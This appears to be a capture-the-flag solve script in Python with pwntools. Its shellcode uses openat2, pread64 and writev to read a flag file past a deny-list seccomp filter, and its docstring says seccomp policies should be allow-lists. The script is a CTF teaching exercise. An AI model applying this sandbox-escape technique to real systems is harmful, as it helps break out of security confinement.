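#!/usr/bin/python3
"""Solve script for the ``mad_seccomp`` challenge.

The binary runs under a seccomp filter.  The injected x86-64 shellcode reads
``flag.txt`` without using the classic open/read/write trio: it calls
openat2 (437), pread64 (17) and writev (20) instead.  A deny-list style
filter that only blocks the usual file syscalls therefore does not stop it;
the defensive takeaway is that seccomp policies should be allow-lists.
"""
from pwn import *

context.binary = target = ELF("./mad_seccomp", checksec=False)
r = process()

# The path string is appended directly after the assembled stub, so the stub
# reaches it at rax+STUB_LEN.  This assumes rax holds the shellcode base when
# execution starts — TODO confirm against the binary's jump-to-buffer code.
FLAG_PATH = b"flag.txt\0"
STUB_LEN = 108  # must equal len(asm(STUB)); verified before sending

# Stage 1: fd = openat2(AT_FDCWD, rax+108, &how, 24)
#   how = { flags = 2, mode = 0, resolve = 16 }  (struct open_how, 24 bytes,
#   built at rax+200; resolve=0x10 is RESOLVE_IN_ROOT on Linux — verify)
OPEN_STAGE = """
lea rsi, [rax+108]
lea rdx, [rax+200]
mov QWORD PTR [rdx], 2
mov QWORD PTR [rdx+16], 16
mov rax, 437
mov rdi, -100
mov r10, 24
syscall
"""

# Stage 2: n = pread64(fd, rax+300, 100, 0)
#   `mov al, 17` only rewrites the low byte of rax, so this relies on
#   openat2 having returned a small non-negative fd.  `sub r10b, r10b`
#   clears the low byte of r10 (24 -> 0) for the offset argument.
READ_STAGE = """
mov rdi, rax
mov al, 17
lea rsi, [rdx+100]
mov rdx, 100
sub r10b, r10b
syscall
"""

# Stage 3: writev(1, &iov, 1) with iov = { base = rax+300, len = n }
#   built at rax+400 (the [rsi+108] here is the iov_len slot, unrelated
#   to STUB_LEN).
WRITE_STAGE = """
lea r11, [rsi]
mov QWORD PTR [rsi+100], r11
mov QWORD PTR [rsi+108], rax
mov rdi, 1
lea rsi, [rsi+100]
mov rdx, 1
mov rax, 20
syscall
"""

STUB = OPEN_STAGE + READ_STAGE + WRITE_STAGE

sc = asm(STUB)
# Guard the hard-coded path offset: if the assembler emits a different
# encoding the stub would silently open garbage instead of FLAG_PATH.
if len(sc) != STUB_LEN:
    raise RuntimeError(
        f"stub assembled to {len(sc)} bytes, expected {STUB_LEN}; "
        "the rax+108 path offset inside the stub no longer matches"
    )
sc += FLAG_PATH

r.send(sc)
r.interactive()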